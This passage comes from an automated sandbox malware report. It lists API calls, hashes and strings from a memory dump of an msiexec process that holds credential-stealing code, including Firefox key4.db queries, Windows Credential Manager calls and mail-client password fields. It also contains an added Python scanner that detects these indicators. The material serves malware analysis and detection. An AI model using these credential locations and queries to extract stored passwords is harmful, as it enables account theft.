                                                                                                                                                • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
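The four function blocks above (the LoadLibrary/GetProcAddress resolution of the Crypt* APIs, the GetPrivateProfileString reader for POP3Server/ESMTPPassword, the Mozilla logins reader with httpRealm/encryptedPassword and the imap://, mailbox:// and smtp:// prefixes, and the RegQueryValueExA reader for the Outlook profile value names) each carry a distinctive string set. Those sets are usable on their own as a memory-dump fingerprint for the embedded credential-recovery code, independent of the opcode hashes. The scanner below is an added example, not part of the Joe Sandbox report or of any tool it names: the indicator strings are copied from the report's String ID lines, while the group names, the 50% hit threshold and the constructed sample dump are this example's own assumptions.

```python
"""Fingerprint a process memory dump for the credential-harvesting string
sets listed in the report above.  Added example, not report or tool code:
indicator strings come from the report's String ID lines; group names,
threshold and the sample dump bytes are this example's own assumptions."""
from typing import Dict, List, Tuple

# Indicator groups copied from the report's String ID lines (ANSI build,
# hence CryptAcquireContextA and the _mbscpy/sprintf call sites).
INDICATOR_GROUPS: Dict[str, List[str]] = {
    # Crypt* names resolved at runtime via LoadLibrary/GetProcAddress
    "cryptoapi_resolve": [
        "advapi32.dll", "CryptAcquireContextA", "CryptCreateHash",
        "CryptHashData", "CryptDeriveKey", "CryptImportKey", "CryptDecrypt",
        "CryptGetHashParam", "CryptDestroyHash", "CryptDestroyKey",
        "CryptReleaseContext",
    ],
    # INI-style mail settings read through GetPrivateProfileString
    "ini_mail_creds": [
        "POP3Server", "POP3Username", "POP3Password",
        "SMTPServer", "ESMTPUsername", "ESMTPPassword",
    ],
    # Mozilla logins field names plus the mail URL formats
    "mozilla_logins": [
        "logins", "hostname", "httpRealm", "usernameField", "passwordField",
        "encryptedUsername", "encryptedPassword",
        "imap://%s", "mailbox://%s", "smtp://%s",
    ],
    # Outlook profile value names queried via RegQueryValueExA
    # (bare "POP3"/"IMAP"/"SMTP"/"HTTPMail" are omitted: too short to be useful)
    "outlook_registry": [
        "POP3 Server", "POP3 User Name", "POP3 Port", "POP3 Secure Connection",
        "IMAP Server", "IMAP User Name", "IMAP Port", "IMAP Secure Connection",
        "SMTP Server", "SMTP Email Address", "SMTP Display Name", "SMTP Port",
        "HTTPMail Server", "HTTPMail User Name", "HTTPMail Port", "Password2",
    ],
}

# Fraction of a group's strings that must be present to call the group a hit.
# Assumed value, chosen to tolerate partially paged-out or overwritten regions.
HIT_FRACTION = 0.5


def find_indicators(data: bytes, group: List[str]) -> List[Tuple[str, int, str]]:
    """Return (indicator, offset, encoding) for each group string found in
    `data`, trying raw ASCII and UTF-16LE forms.  Raw substring search is
    deliberate: the report's strings are not all NUL-terminated literals."""
    hits = []
    for s in group:
        for enc in ("ascii", "utf-16le"):
            off = data.find(s.encode(enc))
            if off != -1:
                hits.append((s, off, enc))
    return hits


def fingerprint_dump(data: bytes) -> Dict[str, dict]:
    """Score every indicator group against the dump.  A group is 'present'
    when at least HIT_FRACTION of its strings were found."""
    report = {}
    for name, strings in INDICATOR_GROUPS.items():
        hits = find_indicators(data, strings)
        found = {h[0] for h in hits}
        report[name] = {
            "present": len(found) >= HIT_FRACTION * len(strings),
            "found": sorted(found),
            "missing": sorted(set(strings) - found),
            "first_offset": min((h[1] for h in hits), default=None),
        }
    return report


def build_sample_dump() -> bytes:
    """Constructed stand-in for a dump, not real sample data: padding, one
    unrelated string, the Mozilla and Outlook sets in ASCII, seven of the
    eleven Crypt* names as UTF-16LE, and only two of the six INI names."""
    ascii_part = b"\x00" * 64 + b"MSVCRT.dll\x00"
    ascii_part += b"\x00".join(s.encode() for s in INDICATOR_GROUPS["mozilla_logins"]) + b"\x00"
    ascii_part += b"\x00".join(s.encode() for s in INDICATOR_GROUPS["outlook_registry"]) + b"\x00"
    wide_part = b"\x00\x00".join(
        s.encode("utf-16le") for s in INDICATOR_GROUPS["cryptoapi_resolve"][:7]) + b"\x00\x00"
    ini_part = b"POP3Server\x00SMTPServer\x00"   # below threshold on purpose
    return ascii_part + b"\xcc" * 32 + wide_part + ini_part


if __name__ == "__main__":
    for name, r in fingerprint_dump(build_sample_dump()).items():
        print(f"{name:18} present={r['present']!s:5} found={len(r['found']):2}"
              f" first_offset={r['first_offset']} missing={r['missing']}")
```

On a real Joe Sandbox memory dump (`*.sdmp`) the same call is `fingerprint_dump(open(path, "rb").read())`; a group reported present with a low first offset inside a 0x400000-based image is consistent with the report's "based on PE: true" dumps, whereas a hit only in UTF-16LE would point at a different, wide-character build than the one analysed here.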
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                • memset.MSVCRT ref: 0040128E
                                                                                                                                                • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2998058495-0
                                                                                                                                                • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                                                • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                                                • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                                                • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                                                APIs
                                                                                                                                                • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                                                                • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                                                                • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                                                                • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                                                                • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                                                                • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                • API String ID: 231171946-2189169393
                                                                                                                                                • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                                                • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                • API String ID: 633282248-1996832678
                                                                                                                                                • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                                • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                                                • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                                • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00406782
                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                                • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                                                                • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                                • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                                • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                                                                • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                                • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                                • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                                • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                                • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                                                Strings
                                                                                                                                                • , xrefs: 00406834
                                                                                                                                                • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                • key4.db, xrefs: 00406756
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                • API String ID: 3614188050-3983245814
                                                                                                                                                • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                                                • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: sprintf$memset$_mbscpy
                                                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                • API String ID: 3402215030-3842416460
                                                                                                                                                • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                                • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                                                • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                                • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                  • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                                                                  • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                  • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                  • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                  • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                • strlen.MSVCRT ref: 0040F139
                                                                                                                                                • strlen.MSVCRT ref: 0040F147
                                                                                                                                                • memset.MSVCRT ref: 0040F187
                                                                                                                                                • strlen.MSVCRT ref: 0040F196
                                                                                                                                                • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                • strlen.MSVCRT ref: 0040F207
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                                • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                                • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                • API String ID: 2003275452-3138536805
                                                                                                                                                • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                                • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                                                • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                                • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040C3F7
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                                • strrchr.MSVCRT ref: 0040C417
                                                                                                                                                • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                                • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                                • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                • API String ID: 1012775001-1343505058
                                                                                                                                                • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                                                • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                                                • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                                                • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
APIs
• memset.MSVCRT ref: 00444612
  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
• strlen.MSVCRT ref: 0044462E
• memset.MSVCRT ref: 00444668
• memset.MSVCRT ref: 0044467C
• memset.MSVCRT ref: 00444690
• memset.MSVCRT ref: 004446B6
  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
  • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
• memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
• memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
• memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
• _mbscpy.MSVCRT(?,?), ref: 00444812
• memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
• memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memcpymemset$strlen$_mbscpy
• String ID: salu
• API String ID: 3691931180-4177317985
APIs
• LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
• GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
• GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
• FreeLibrary.KERNEL32(00000000), ref: 004100C4
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
• API String ID: 2449869053-232097475
APIs
• sprintf.MSVCRT ref: 0040957B
• LoadMenuA.USER32(?,?), ref: 00409589
  • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
  • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
  • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
  • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
• DestroyMenu.USER32(00000000), ref: 004095A7
• sprintf.MSVCRT ref: 004095EB
• CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
• memset.MSVCRT ref: 0040961C
• GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
• EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
• DestroyWindow.USER32(00000000), ref: 0040965C
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
• String ID: caption$dialog_%d$menu_%d
• API String ID: 3259144588-3822380221
APIs
  • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
• LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
• GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
• GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
• GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
• GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
• GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
• API String ID: 2449869053-4258758744
APIs
• wcsstr.MSVCRT ref: 0040426A
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
• _mbscpy.MSVCRT(?,?), ref: 004042D5
• _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
• strchr.MSVCRT ref: 004042F6
• strlen.MSVCRT ref: 0040430A
• sprintf.MSVCRT ref: 0040432B
• strchr.MSVCRT ref: 0040433C
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
• String ID: %s@gmail.com$www.google.com
• API String ID: 3866421160-4070641962
APIs
• _mbscpy.MSVCRT(0045A448,?), ref: 00409749
• _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
  • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
  • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
  • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
• EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
• EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
• _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
• memset.MSVCRT ref: 004097BD
• LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
• String ID: TranslatorName$TranslatorURL$general$strings
• API String ID: 1035899707-3647959541
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: _strcmpi_strnicmpmemsetsprintf$strlen
• String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
• API String ID: 2360744853-2229823034
                                                                                                                                                APIs
                                                                                                                                                • strchr.MSVCRT ref: 004100E4
                                                                                                                                                • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                  • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                                • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                • memset.MSVCRT ref: 00410129
                                                                                                                                                  • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                  • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                                                • memset.MSVCRT ref: 00410171
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                                                • _mbscat.MSVCRT ref: 00410197
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
